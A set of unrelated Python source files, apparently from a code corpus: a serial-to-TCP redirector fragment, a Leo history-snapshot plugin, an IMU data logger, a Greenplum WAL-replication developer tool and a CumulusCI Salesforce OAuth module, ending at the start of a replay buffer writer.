ser.flushOutput()
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((options.listen, options.port))
srv.listen(1)
def signal_handler(signal, frame):
pass
signal.signal(signal.SIGINT, signal_handler)
try:
connection, addr = srv.accept()
address, port = addr
log.info('Connecting with tcp://{0}:{1}'.format(address, port))
if address in access_list:
#enter console->serial loop
r = Redirector(ser, connection)
r.shortcut()
else:
log.error('Address {0} not in access list.'.format(address))
except socket.error as msg:
log.error(msg)
finally:
try:
connection.close()
log.info('Disconnecting')
except NameError:
pass
except Exception as e:
log.warning(repr(e))
|
history_tracer.py
|
#@+leo-ver=5-thin
#@+node:vitalije.20190928154420.1: * @file ../plugins/history_tracer.py
#@+<< docstring >>
#@+node:vitalije.20190928154420.2: ** << docstring >>
"""This plugin cooperates with leo-ver-serv utilty.
To install leo-ver-serv visit https://crates.io/crates/leo-ver-serv
In idle time, whenever user has no activity in last 5 seconds,
this plugin will send the snapshot of Leo outline to the local
leo-ver-serv server and it will record snapshot in sqlite3 database
named after the Leo file by adding '.history' to file name. For example
if you edit file /tmp/a.leo, history will be recorded in the file
/tmp/a.leo.history.
leo-ver-serv will also serve a small web application for displaying
outline and allows user to browse all recorded versions of the file.
leo-ver-serv requires as its first argument a filename of a file
containing absolute paths to the Leo files that are tracked. A
suitable value for this argument is ~/.leo/.leoRecentFiles.txt
The second argument for leo-ver-serv is a port number. The same port
number must be in your settings.
@int history-tracer-port=8087
Author: vitalije(at)kviziracija.net
"""
#@-<< docstring >>
#@+<< imports >>
#@+node:vitalije.20190928154420.3: ** << imports >>
import datetime
import time
import threading
from urllib.request import urlopen
from urllib.error import URLError
from leo.core import leoGlobals as g
from leo.core.leoQt import QtCore
#
# Fail fast, right after all imports.
g.assertUi('qt') # May raise g.UiTypeException, caught by the plugins manager.
#@-<< imports >>
idle_checker = None
#@+others
#@+node:vitalije.20190928154420.4: ** init
def init():
"""Return True if the plugin has loaded successfully."""
ok = g.app.gui.guiName() == "qt"
if ok:
g.registerHandler(['command1', 'command2'], c12_hook)
g.registerHandler('start2', init_idle_checker)
g.plugin_signon(__name__)
return ok
#@+node:vitalije.20190928154420.6: ** c12_hook
def c12_hook(tag, keys):
c = keys.get('c')
c.user_dict['last_command_at'] = time.time()
#@+node:vitalije.20190928160510.1: ** IdleChecker
def init_idle_checker(tag, keys):
global idle_checker
class IdleChecker(QtCore.QObject):
def __init__(self):
QtCore.QObject.__init__(self)
self._tid = self.startTimer(5000)
def stop(self):
self.killTimer(self._tid)
def timerEvent(self, ev):
t = time.time()
for i, cx in enumerate(g.app.commanders()):
t1 = cx.user_dict.get('last_command_at', t)
t2 = cx.user_dict.get('last_snap_at', 0)
if t - t1 > 5 and t1 > t2:
cx.user_dict['last_snap_at'] = t
if save_snapshot(cx):
g.es('snap', i, cx.mFileName.rpartition('/')[2])
print("don't forget to launch leo-ver-serv!!!")
idle_checker = IdleChecker()
#@+node:vitalije.20190928160520.1: ** save_snapshot
def save_snapshot(c):
data = snap(c)
x = data.split('\n', 2)[2]
y = c.user_dict.get('last_snapshot_data')
if x == y:
return False
c.user_dict['last_snapshot_data'] = x
def pf():
t1 = time.perf_counter()
url = 'http://localhost:%d/add-snapshot'%c.config.getInt('history-tracer-port')
with urlopen(url, data=data.encode('utf8')) as resp:
try:
txt = resp.read().decode('utf8')
except URLError as e:
if 'refused' in str(e):
g.es('it seems that leo-ver-serv is not running', color='warning')
if txt == 'Unkown file':
g.es(c.mFileName, 'is not tracked by history_tracer plugin\n'
'You have to restart leo-ver-serv to accept new files',
color='warning')
ms = '%.2fms'%(1000 * (time.perf_counter() - t1))
print("save_snapshot:", data.partition('\n')[0], txt, 'in', ms)
threading.Thread(target=pf, name="snapshot-saver").start()
return True
#@+node:vitalije.20190928160538.1: ** snap
def snap(c):
dt = datetime.datetime.utcnow()
buf = [c.mFileName, '\n', dt.strftime('%Y-%m-%dT%H:%M:%S.000000'), '\n']
nbuf = {}
def it(v, lev):
if v.gnx not in nbuf:
s = '%s\n%s'%(v.gnx,v.b)
n = len(s.encode('utf8'))
nbuf[v.gnx] = '%d %s'%(n, s)
yield v, lev
for ch in v.children:
yield from it(ch, lev+1)
for v, lev in it(c.hiddenRootNode, 0):
buf.append('%d %s %s\n'%(lev, v.fileIndex, v._headString))
buf.append('\n')
for gnx, hb in nbuf.items():
buf.append(hb)
return ''.join(buf)
#@-others
#@@language python
#@@tabwidth -4
#@-leo
|
csv_4VA.py
|
import numpy as np
from picamera import PiCamera
from tinkerforge.ip_connection import IPConnection
from tinkerforge.brick_imu_v2 import BrickIMUV2 as IMU
from math import pi
import csv, sys, threading, cv2, time
def imu_acq(freq, imu, d):
#csv header configuration
Entete_csv = [
'timestamp',
'omega_x', 'omega_y', 'omega_z',
'alpha_x' , 'alpha_y', 'alpha_z',
]
path_csv = '/home/pi/Projet_Stage/Variance_Allan'
csv_file = open( path_csv + '/imu_va.csv', 'w')
csv_writer = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
csv_writer.writerow(Entete_csv)
t0 = time.time()
t1 = 0
while t1-t0 <= d :
time.sleep(1.0/freq)
xpp, ypp, zpp = imu.get_acceleration()
thp, Php, Psp = imu.get_angular_velocity()
row = [
str(time.time_ns()), # temps en secondes depuis le début de l'expérience
str((thp/16)), str((Php/16)), str((Psp/16)), #en rad/s
str(xpp/100), str(ypp/100), str(zpp/100), #en m/s-2
]
csv_writer.writerow(row)
t1 = time.time()
"""
Definition of acquisition parameters (frequency of sampling, and duration) :
"""
freq_imu = 100 #Hz (imu)
d = 7200
#IMU connection
HOST = "localhost"
PORT = 4223
UID = "6yoKcp"
#connection to brick, and binding
ipcon = IPConnection()
imu = IMU(UID, ipcon)
ipcon.connect(HOST, PORT)
#few led blinking to announce that IMU is connecting
imu.leds_off()
for i in range(0,3):
imu.leds_on()
time.sleep(0.2)
imu.leds_off()
time.sleep(0.1)
#Check the fusion mode of data
"""
BrickIMUV2.SENSOR_FUSION_OFF = 0
BrickIMUV2.SENSOR_FUSION_ON = 1
BrickIMUV2.SENSOR_FUSION_ON_WITHOUT_MAGNETOMETER = 2
BrickIMUV2.SENSOR_FUSION_ON_WITHOUT_FAST_MAGNETOMETER_CALIBRATION = 3
"""
imu.set_sensor_fusion_mode(0)
a = imu.get_sensor_fusion_mode()
print('Fusion mode : ',a)
print('IMU data frequency : ' + str(freq_imu) + 'Hz')
print('time of experiment : ' + str(d/3600) + 'h')
"""
Main : recording gyrometrics and accelerations informations
"""
input("Click entr to begin recording...")
#Creating thread
th1 = threading.Thread(target= imu_acq, args = (freq_imu, imu, d))
#starting thread
th1.start()
print("Logger started...")
|
gpsegwalrep.py
|
#! /usr/bin/env python
"""
Initialize, start, stop, or destroy WAL replication mirror segments.
============================= DISCLAIMER =============================
This is a developer tool to assist with development of WAL replication
for mirror segments. This tool is not meant to be used in production.
It is suggested to only run this tool against a gpdemo cluster that
was initialized with no FileRep mirrors.
Example:
WITH_MIRRORS=false make create-demo-cluster
======================================================================
Assumptions:
1. Greenplum cluster was compiled with --enable-segwalrep
2. Greenplum cluster was initialized without mirror segments.
3. Cluster is all on one host
4. Greenplum environment is all setup (greenplum_path.sh, MASTER_DATA_DIRECTORY, PGPORT, etc.)
5. Greenplum environment is started
6. Greenplum environment is the same throughout tool usage
Assuming all of the above, you can just run the tool as so:
./gpsegwalrep.py [init|start|stop|destroy]
"""
import argparse
import os
import sys
import subprocess
import threading
import datetime
import time
from gppylib.db import dbconn
PRINT_LOCK = threading.Lock()
THREAD_LOCK = threading.Lock()
def runcommands(commands, thread_name, command_finish, exit_on_error=True):
output = []
for command in commands:
try:
output.append('%s: Running command... %s' % (datetime.datetime.now(), command))
with THREAD_LOCK:
output = output + subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True).split('\n')
except subprocess.CalledProcessError, e:
output.append(str(e))
output.append(e.output)
if exit_on_error:
with PRINT_LOCK:
for line in output:
print '%s: %s' % (thread_name, line)
print ''
sys.exit(e.returncode)
output.append('%s: %s' % (datetime.datetime.now(), command_finish))
with PRINT_LOCK:
for line in output:
print '%s: %s' % (thread_name, line)
print ''
def displaySegmentConfiguration():
commands = []
commands.append("psql postgres -c \"select * from gp_segment_configuration order by content, dbid\"")
runcommands(commands, "", "")
class InitMirrors():
''' Initialize the WAL replication mirror segment '''
def __init__(self, cluster_config, hostname):
self.clusterconfig = cluster_config
self.segconfigs = cluster_config.get_seg_configs()
self.hostname = hostname
def initThread(self, segconfig, user):
commands = []
primary_port = segconfig.port
primary_dir = segconfig.fselocation
mirror_contentid = segconfig.content
mirror_dir = segconfig.fselocation.replace('dbfast', 'dbfast_mirror')
mirror_port = primary_port + 10000
commands.append("echo 'host replication %s samenet trust' >> %s/pg_hba.conf" % (user, primary_dir))
commands.append("pg_ctl -D %s reload" % primary_dir)
# 1. create base backup
commands.append("pg_basebackup -x -R -c fast -E ./pg_log -E ./db_dumps -E ./gpperfmon/data -E ./gpperfmon/logs -D %s -h %s -p %d" % (mirror_dir, self.hostname, primary_port))
commands.append("mkdir %s/pg_log; mkdir %s/pg_xlog/archive_status" % (mirror_dir, mirror_dir))
# 2. update catalog
catalog_update_query = "select pg_catalog.gp_add_segment_mirror(%d::int2, '%s', '%s', %d, -1, '{pg_system, %s}')" % (mirror_contentid, self.hostname, self.hostname, mirror_port, mirror_dir)
commands.append("PGOPTIONS=\"-c gp_session_role=utility\" psql postgres -c \"%s\"" % catalog_update_query)
thread_name = 'Mirror content %d' % mirror_contentid
command_finish = 'Initialized mirror at %s' % mirror_dir
runcommands(commands, thread_name, command_finish)
def run(self):
# Assume db user is current user
user = subprocess.check_output(["whoami"]).rstrip('\n')
initThreads = []
for segconfig in self.segconfigs:
assert(segconfig.preferred_role == GpSegmentConfiguration.ROLE_PRIMARY)
assert(segconfig.content != GpSegmentConfiguration.MASTER_CONTENT_ID)
thread = threading.Thread(target=self.initThread, args=(segconfig, user))
thread.start()
initThreads.append(thread)
for thread in initThreads:
thread.join()
class StartInstances():
''' Start a greenplum segment '''
def __init__(self, cluster_config, host, wait=False):
self.clusterconfig = cluster_config
self.segconfigs = cluster_config.get_seg_configs()
self.host = host
self.wait = wait
def startThread(self, segconfig):
commands = []
waitstring = ''
dbid = segconfig.dbid
contentid = segconfig.content
segment_port = segconfig.port
segment_dir = segconfig.fselocation
segment_role = StartInstances.getRole(contentid)
# Need to set the dbid to 0 on segments to prevent use in mmxlog records
if contentid != GpSegmentConfiguration.MASTER_CONTENT_ID:
dbid = 0
opts = ("-p %d --gp_dbid=%d --silent-mode=true -i -M %s --gp_contentid=%d --gp_num_contents_in_cluster=%d" %
(segment_port, dbid, segment_role, contentid, self.clusterconfig.get_num_contents()))
# Arguments for the master. -x sets the dbid for the standby master. Hardcoded to 0 for now, but may need to be
# refactored when we start to focus on the standby master.
#
# -E in GPDB will set Gp_entry_postmaster = true;
# to start master in utility mode, need to remove -E and add -c gp_role=utility
#
# we automatically assume people want to start in master only utility mode
# if the self.clusterconfig.get_num_contents() is 0
if contentid == GpSegmentConfiguration.MASTER_CONTENT_ID:
opts += " -x 0"
if self.clusterconfig.get_num_contents() == 0:
opts += " -c gp_role=utility"
else:
opts += " -E"
if self.wait:
waitstring = "-w -t 180"
commands.append("pg_ctl -D %s %s -o '%s' start" % (segment_dir, waitstring, opts))
commands.append("pg_ctl -D %s status" % segment_dir)
if contentid == GpSegmentConfiguration.MASTER_CONTENT_ID:
segment_label = 'master'
elif segconfig.preferred_role == GpSegmentConfiguration.ROLE_PRIMARY:
segment_label = 'primary'
else:
segment_label = 'mirror'
thread_name = 'Segment %s content %d' % (segment_label, contentid)
command_finish = 'Started %s segment with content %d and port %d at %s' % (segment_label, contentid, segment_port, segment_dir)
runcommands(commands, thread_name, command_finish)
@staticmethod
def getRole(contentid):
if contentid == GpSegmentConfiguration.MASTER_CONTENT_ID:
return 'master'
else:
return 'mirrorless'
def run(self):
startThreads = []
for segconfig in self.segconfigs:
thread = threading.Thread(target=self.startThread, args=(segconfig,))
thread.start()
startThreads.append(thread)
for thread in startThreads:
thread.join()
class StopInstances():
''' Stop all segments'''
def __init__(self, cluster_config):
self.clusterconfig = cluster_config
self.segconfigs = cluster_config.get_seg_configs()
def stopThread(self, segconfig):
commands = []
segment_contentid = segconfig.content
segment_dir = segconfig.fselocation
if segment_contentid == GpSegmentConfiguration.MASTER_CONTENT_ID:
segment_type = 'master'
elif segconfig.preferred_role == GpSegmentConfiguration.ROLE_PRIMARY:
segment_type = 'primary'
else:
segment_type = 'mirror'
commands.append("pg_ctl -D %s stop" % segment_dir)
thread_name = 'Segment %s content %d' % (segment_type, segment_contentid)
command_finish = 'Stopped %s segment at %s' % (segment_type, segment_dir)
runcommands(commands, thread_name, command_finish)
def run(self):
stopThreads = []
for segconfig in self.segconfigs:
thread = threading.Thread(target=self.stopThread, args=(segconfig,))
thread.start()
stopThreads.append(thread)
for thread in stopThreads:
thread.join()
class DestroyMirrors():
''' Destroy the WAL replication mirror segment '''
def __init__(self, cluster_config):
self.clusterconfig = cluster_config
self.segconfigs = cluster_config.get_seg_configs()
def destroyThread(self, segconfig):
commands = []
mirror_contentid = segconfig.content
mirror_dir = segconfig.fselocation
commands.append("pg_ctl -D %s stop" % mirror_dir)
commands.append("rm -rf %s" % mirror_dir)
thread_name = 'Mirror content %d' % mirror_contentid
command_finish = 'Destroyed mirror at %s' % mirror_dir
runcommands(commands, thread_name, command_finish, False)
# Let FTS recognize that mirrors are gone. As a result,
# primaries will be marked not-in-sync. If this step is
# omitted, FTS will stop probing as soon as mirrors are
# removed from catalog and primaries will be left "in-sync"
# without mirrors.
#
# FIXME: enhance gp_remove_segment_mirror() to do this, so
# that utility remains simplified. Remove this stopgap
# thereafter.
ForceFTSProbeScan(self.clusterconfig,
GpSegmentConfiguration.STATUS_DOWN,
GpSegmentConfiguration.NOT_IN_SYNC)
commands = []
catalog_update_query = "select pg_catalog.gp_remove_segment_mirror(%d::int2)" % (mirror_contentid)
commands.append("PGOPTIONS=\"-c gp_session_role=utility\" psql postgres -c \"%s\"" % catalog_update_query)
command_finish = 'Removed mirror %s from catalog' % mirror_dir
runcommands(commands, thread_name, command_finish, False)
def run(self):
destroyThreads = []
for segconfig in self.segconfigs:
assert(segconfig.preferred_role == GpSegmentConfiguration.ROLE_MIRROR)
thread = threading.Thread(target=self.destroyThread, args=(segconfig,))
thread.start()
destroyThreads.append(thread)
for thread in destroyThreads:
thread.join()
class GpSegmentConfiguration():
ROLE_PRIMARY = 'p'
ROLE_MIRROR = 'm'
STATUS_DOWN = 'd'
STATUS_UP = 'u'
NOT_IN_SYNC = 'n'
IN_SYNC = 's'
MASTER_CONTENT_ID = -1
def __init__(self, dbid, content, port, fselocation, preferred_role, status, mode):
self.dbid = dbid
self.content = content
self.port = port
self.fselocation = fselocation
self.preferred_role = preferred_role
self.status = status
self.mode = mode
class ClusterConfiguration():
''' Cluster configuration '''
def __init__(self, hostname, port, dbname, role = "all", status = "all", include_master = True):
self.hostname = hostname
self.port = port
self.dbname = dbname
self.role = role
self.status = status
self.include_master = include_master
self.refresh()
def get_num_contents(self):
return self.num_contents;
def get_seg_configs(self):
return self.seg_configs;
def get_gp_segment_ids(self):
ids = []
for seg_config in self.seg_configs:
ids.append(str(seg_config.content))
return ','.join(ids)
def refresh(self):
query = ("SELECT dbid, content, port, fselocation, preferred_role, status, mode "
"FROM gp_segment_configuration s, pg_filespace_entry f "
"WHERE s.dbid = fsedbid")
if self.status != "all":
query += " and s.status = '" + self.status + "'"
if self.role != "all":
query += " and s.role = '" + self.role + "'"
if not self.include_master:
query += " and s.content != " + str(GpSegmentConfiguration.MASTER_CONTENT_ID)
print '%s: fetching cluster configuration' % (datetime.datetime.now())
dburl = dbconn.DbURL(self.hostname, self.port, self.dbname)
print '%s: fetched cluster configuration' % (datetime.datetime.now())
try:
with dbconn.connect(dburl, utility=True) as conn:
resultsets = dbconn.execSQL(conn, query).fetchall()
except Exception, e:
print e
sys.exit(1)
self.seg_configs = []
self.num_contents = 0
for result in resultsets:
seg_config = GpSegmentConfiguration(result[0], result[1], result[2], result[3], result[4], result[5], result[6])
self.seg_configs.append(seg_config)
# Count primary segments
if (seg_config.preferred_role == GpSegmentConfiguration.ROLE_PRIMARY
and seg_config.content != GpSegmentConfiguration.MASTER_CONTENT_ID):
self.num_contents += 1
def check_status_and_mode(self, expected_status, expected_mode):
''' Check if all the instance reached the expected_state and expected_mode '''
for seg_config in self.seg_configs:
if (seg_config.status != expected_status
or seg_config.mode != expected_mode):
return False
return True
class ColdMasterClusterConfiguration(ClusterConfiguration):
# this constructor is only used for ColdStartMaster
def __init__(self, port, master_directory):
self.seg_configs = []
master_seg_config = GpSegmentConfiguration(1, GpSegmentConfiguration.MASTER_CONTENT_ID,
port, master_directory,
GpSegmentConfiguration.ROLE_PRIMARY,
GpSegmentConfiguration.STATUS_DOWN,
GpSegmentConfiguration.NOT_IN_SYNC)
self.seg_configs.append(master_seg_config)
self.num_contents = 0
def defargs():
parser = argparse.ArgumentParser(description='Initialize, start, stop, or destroy WAL replication mirror segments')
parser.add_argument('--host', type=str, required=False, default=os.getenv('PGHOST', 'localhost'),
help='Master host to get segment config information from')
parser.add_argument('--port', type=str, required=False, default=os.getenv('PGPORT', '15432'),
help='Master port to get segment config information from')
parser.add_argument('--master-directory', type=str, required=False, default=os.getenv('MASTER_DATA_DIRECTORY'),
help='Master port to get segment config information from')
parser.add_argument('--database', type=str, required=False, default='postgres',
help='Database name to get segment config information from')
parser.add_argument('operation', type=str, choices=['clusterstart', 'clusterstop', 'init', 'start', 'stop', 'destroy', 'recover'])
return parser.parse_args()
def GetNumberOfSegments(input_segments):
if len(input_segments) > 0:
return len(input_segments.split(','))
return 0
def WaitForRecover(cluster_configuration, max_retries = 200):
'''Wait for the gp_stat_replication to reach given sync_error'''
cmd_all_sync = ("psql postgres -A -R ',' -t -c \"SELECT gp_segment_id"
" FROM gp_stat_replication"
" WHERE gp_segment_id in (%s) and coalesce(sync_state, 'NULL') = 'sync'\"" %
cluster_configuration.get_gp_segment_ids())
cmd_find_error = ("psql postgres -A -R ',' -t -c \"SELECT gp_segment_id"
" FROM gp_stat_replication"
" WHERE gp_segment_id in (%s) and sync_error != 'none'\"" %
cluster_configuration.get_gp_segment_ids())
number_of_segments = len(cluster_configuration.seg_configs)
print "cmd_all_sync: %s" % cmd_all_sync
print "cmd_find_error: %s" % cmd_find_error
print "number of contents: %s " % number_of_segments
retry_count = 1
while (retry_count < max_retries):
result_all_sync = subprocess.check_output(cmd_all_sync, stderr=subprocess.STDOUT, shell=True).strip()
number_of_all_sync = GetNumberOfSegments(result_all_sync)
result_find_error = subprocess.check_output(cmd_find_error, stderr=subprocess.STDOUT, shell=True).strip()
number_of_find_error = GetNumberOfSegments(result_find_error)
if number_of_all_sync + number_of_find_error == number_of_segments:
return result_find_error
else:
retry_count += 1
print "WARNING: Incremental recovery took longer than expected!"
cmd_find_recovering = ("psql postgres -A -R ',' -t -c \"SELECT gp_segment_id"
" FROM gp_stat_replication"
" WHERE gp_segment_id in (%s) and sync_error = 'none'\"" %
cluster_configuration.get_gp_segment_ids())
result_find_recovering = subprocess.check_output(cmd_find_recovering, stderr=subprocess.STDOUT, shell=True).strip()
return result_find_recovering
def ForceFTSProbeScan(cluster_configuration, expected_status = None, expected_mode = None, max_probes=2000):
'''Force FTS probe scan to reflect primary and mirror status in catalog.'''
commands = []
commands.append("psql postgres -c \"SELECT gp_request_fts_probe_scan()\"")
probe_count = 1
# if the expected_mirror_status is not None, we wait until the mirror status is updated
while(True):
runcommands(commands, "Force FTS probe scan", "FTS probe refreshed catalog")
if (expected_status == None or expected_mode == None):
return
cluster_configuration.refresh()
if (cluster_configuration.check_status_and_mode(expected_status, expected_mode)):
return
if probe_count >= max_probes:
print("ERROR: Server did not trasition to expected_mirror_status %s within %d probe attempts"
% (expected_status, probe_count))
sys.exit(1)
probe_count += 1
time.sleep(0.1)
if __name__ == "__main__":
# Get parsed args
args = defargs()
# Execute the chosen operation
if args.operation == 'init':
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_PRIMARY, include_master=False)
InitMirrors(cluster_config, args.host).run()
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_MIRROR)
ForceFTSProbeScan(cluster_config, GpSegmentConfiguration.STATUS_DOWN, GpSegmentConfiguration.NOT_IN_SYNC)
elif args.operation == 'clusterstart':
# If we are starting the cluster, we need to start the master before we get the segment info
cold_master_cluster_config = ColdMasterClusterConfiguration(int(args.port), args.master_directory)
StartInstances(cold_master_cluster_config, args.host, wait=True).run()
cluster_config = ClusterConfiguration(args.host, args.port, args.database)
StopInstances(cold_master_cluster_config).run()
StartInstances(cluster_config, args.host).run()
ForceFTSProbeScan(cluster_config)
elif args.operation == 'start':
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_MIRROR,
status=GpSegmentConfiguration.STATUS_DOWN)
StartInstances(cluster_config, args.host).run()
ForceFTSProbeScan(cluster_config, GpSegmentConfiguration.STATUS_UP, GpSegmentConfiguration.IN_SYNC)
elif args.operation == 'recover':
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_MIRROR,
status=GpSegmentConfiguration.STATUS_DOWN)
if len(cluster_config.seg_configs) > 0:
StartInstances(cluster_config, args.host).run()
failed_gp_segment_ids = WaitForRecover(cluster_config)
if len(failed_gp_segment_ids) > 0:
print("ERROR: incremental recovery failed for some segments (%s)" % failed_gp_segment_ids)
ForceFTSProbeScan(cluster_config)
cluster_config.refresh()
StopInstances(cluster_config).run()
sys.exit(1)
ForceFTSProbeScan(cluster_config, GpSegmentConfiguration.STATUS_UP, GpSegmentConfiguration.IN_SYNC)
elif args.operation == 'stop':
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_MIRROR,
status=GpSegmentConfiguration.STATUS_UP)
StopInstances(cluster_config).run()
ForceFTSProbeScan(cluster_config, GpSegmentConfiguration.STATUS_DOWN, GpSegmentConfiguration.NOT_IN_SYNC)
elif args.operation == 'destroy':
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_MIRROR)
DestroyMirrors(cluster_config).run()
elif args.operation == 'clusterstop':
cluster_config = ClusterConfiguration(args.host, args.port, args.database)
StopInstances(cluster_config).run()
if args.operation != 'clusterstop':
displaySegmentConfiguration()
|
salesforce.py
|
from calendar import timegm
from datetime import datetime
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
import http.client
import jwt
import os
import re
import requests
from urllib.parse import quote
from urllib.parse import parse_qs
from urllib.parse import urljoin
from urllib.parse import urlparse
import webbrowser
import threading
import random
import time
import socket
from cumulusci.oauth.exceptions import SalesforceOAuthError
from cumulusci.core.exceptions import (
CumulusCIUsageError,
SalesforceCredentialsException,
)
from cumulusci.utils.http.requests_utils import safe_json_from_response
HTTP_HEADERS = {"Content-Type": "application/x-www-form-urlencoded"}
SANDBOX_DOMAIN_RE = re.compile(
r"^https://([\w\d-]+\.)?(test|cs\d+)(\.my)?\.salesforce\.com/?$"
)
SANDBOX_LOGIN_URL = (
os.environ.get("SF_SANDBOX_LOGIN_URL") or "https://test.salesforce.com"
)
PROD_LOGIN_URL = os.environ.get("SF_PROD_LOGIN_URL") or "https://login.salesforce.com"
def jwt_session(client_id, private_key, username, url=None, auth_url=None):
"""Complete the JWT Token Oauth flow to obtain an access token for an org.
:param client_id: Client Id for the connected app
:param private_key: Private key used to sign the connected app's certificate
:param username: Username to authenticate as
:param url: Org's instance_url
"""
if auth_url:
aud = (
SANDBOX_LOGIN_URL
if auth_url.startswith(SANDBOX_LOGIN_URL)
else PROD_LOGIN_URL
)
else:
aud = PROD_LOGIN_URL
if url is None:
url = PROD_LOGIN_URL
else:
m = SANDBOX_DOMAIN_RE.match(url)
if m is not None:
# sandbox
aud = SANDBOX_LOGIN_URL
# There can be a delay in syncing scratch org credentials
# between instances, so let's use the specific one for this org.
instance = m.group(2)
url = f"https://{instance}.salesforce.com"
payload = {
"alg": "RS256",
"iss": client_id,
"sub": username,
"aud": aud,
"exp": timegm(datetime.utcnow().utctimetuple()),
}
encoded_jwt = jwt.encode(payload, private_key, algorithm="RS256")
data = {
"grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer",
"assertion": encoded_jwt,
}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
token_url = urljoin(url, "services/oauth2/token")
response = requests.post(url=token_url, data=data, headers=headers)
if response.status_code != 200:
raise SalesforceCredentialsException(
f"Error retrieving access token: {response.text}"
)
return safe_json_from_response(response)
class SalesforceOAuth2(object):
def __init__(
self,
client_id,
client_secret,
callback_url,
auth_site="https://login.salesforce.com",
):
self.client_id = client_id
self.client_secret = client_secret
self.callback_url = callback_url
self.auth_site = auth_site
def _request_token(self, request_data):
url = self.auth_site + "/services/oauth2/token"
data = {"client_id": self.client_id, "client_secret": self.client_secret}
data.update(request_data)
return requests.post(url, headers=HTTP_HEADERS, data=data)
def get_authorize_url(self, scope, prompt=None):
url = self.auth_site + "/services/oauth2/authorize"
url += "?response_type=code"
url += f"&client_id={self.client_id}"
url += f"&redirect_uri={self.callback_url}"
url += f"&scope={quote(scope)}"
if prompt:
url += f"&prompt={quote(prompt)}"
return url
def get_token(self, code):
data = {
"grant_type": "authorization_code",
"redirect_uri": self.callback_url,
"code": code,
}
return self._request_token(data)
def refresh_token(self, refresh_token):
data = {"grant_type": "refresh_token", "refresh_token": refresh_token}
return self._request_token(data)
def revoke_token(self, current_token):
url = self.auth_site + "/services/oauth2/revoke"
data = {"token": quote(current_token)}
response = requests.post(url, headers=HTTP_HEADERS, data=data)
response.raise_for_status()
return response
class HTTPDTimeout(threading.Thread):
"Establishes a timeout for a SimpleHTTPServer"
daemon = True # allow the process to quit even if the timeout thread
# is still alive
def __init__(self, httpd, timeout):
self.httpd = httpd
self.timeout = timeout
super().__init__()
def run(self):
"Check every second for HTTPD or quit after timeout"
target_time = time.time() + self.timeout
while time.time() < target_time:
time.sleep(1)
if not self.httpd:
break
if self.httpd: # extremely minor race condition
self.httpd.shutdown()
def quit(self):
"Quit before timeout"
self.httpd = None
class OAuthCallbackHandler(BaseHTTPRequestHandler):
parent = None
def do_GET(self):
args = parse_qs(urlparse(self.path).query, keep_blank_values=True)
if "error" in args:
http_status = http.client.BAD_REQUEST
http_body = f"error: {args['error'][0]}\nerror description: {args['error_description'][0]}"
else:
http_status = http.client.OK
emoji = random.choice(["🎉", "👍", "👍🏿", "🥳", "🎈"])
http_body = f"""<html>
<h1 style="font-size: large">{emoji}</h1>
<p>Congratulations! Your authentication succeeded.</p>"""
code = args["code"]
self.parent.response = self.parent.oauth_api.get_token(code)
if self.parent.response.status_code >= http.client.BAD_REQUEST:
http_status = self.parent.response.status_code
http_body = self.parent.response.text
self.send_response(http_status)
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
self.wfile.write(http_body.encode("utf-8"))
if self.parent.response is None:
response = requests.Response()
response.status_code = http_status
response._content = http_body
self.parent.response = response
# https://docs.python.org/3/library/socketserver.html#socketserver.BaseServer.shutdown
# shutdown() must be called while serve_forever() is running in a different thread otherwise it will deadlock.
threading.Thread(target=self.server.shutdown).start()
class CaptureSalesforceOAuth(object):
def __init__(self, client_id, client_secret, callback_url, auth_site, scope):
self.client_id = client_id
self.client_secret = client_secret
self.callback_url = callback_url
self.auth_site = auth_site
self.httpd = None
self.oauth_api = self._get_oauth_api()
self.response = None
self.scope = scope
self.httpd_timeout = 300
def __call__(self):
url = self._get_redirect_url()
self._launch_browser(url)
self._create_httpd()
print(
f"Spawning HTTP server at {self.callback_url} with timeout of {self.httpd.timeout} seconds.\n"
+ "If you are unable to log in to Salesforce you can "
+ "press ctrl+c to kill the server and return to the command line."
)
# Implement the 300 second timeout
timeout_thread = HTTPDTimeout(self.httpd, self.httpd_timeout)
timeout_thread.start()
# use serve_forever because it is smarter about polling for Ctrl-C
# on Windows.
#
# There are two ways it can be shutdown.
# 1. Get a callback from Salesforce.
# 2. Timeout
try:
# for some reason this is required for Safari (checked Feb 2021)
# https://github.com/SFDO-Tooling/CumulusCI/pull/2373
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(3)
self.httpd.serve_forever()
finally:
socket.setdefaulttimeout(old_timeout)
# timeout thread can stop polling and just finish
timeout_thread.quit()
self._check_response(self.response)
return safe_json_from_response(self.response)
def _check_response(self, response):
if not response:
raise CumulusCIUsageError("Authentication timed out or otherwise failed.")
elif response.status_code == http.client.OK:
return
raise SalesforceOAuthError(
f"status_code: {response.status_code} content: {response.content}"
)
def _create_httpd(self):
url_parts = urlparse(self.callback_url)
server_address = (url_parts.hostname, url_parts.port)
OAuthCallbackHandler.parent = self
self.httpd = HTTPServer(server_address, OAuthCallbackHandler)
self.httpd.timeout = self.httpd_timeout
def _get_oauth_api(self):
return SalesforceOAuth2(
self.client_id, self.client_secret, self.callback_url, self.auth_site
)
def _get_redirect_url(self):
url = self.oauth_api.get_authorize_url(self.scope, prompt="login")
response = requests.get(url)
self._check_response(response)
return url
def _launch_browser(self, url):
print(f"Launching web browser for URL {url}")
webbrowser.open(url, new=1)
|
replay_buffer_writer.py
|
import time
from queue import Queue, Empty, Full
from threading import Thread
from rollout_storage.intefaces.replay_fill_queue_strategy import ReplayFillQueueStrategy
class ReplayWriterQueue:
def __init__(self, replay_buffers, queue_size: int, fill_in_strategy: ReplayFillQueueStrategy, flags, stop_event):
self.flags = flags
self.replay_buffers = replay_buffers
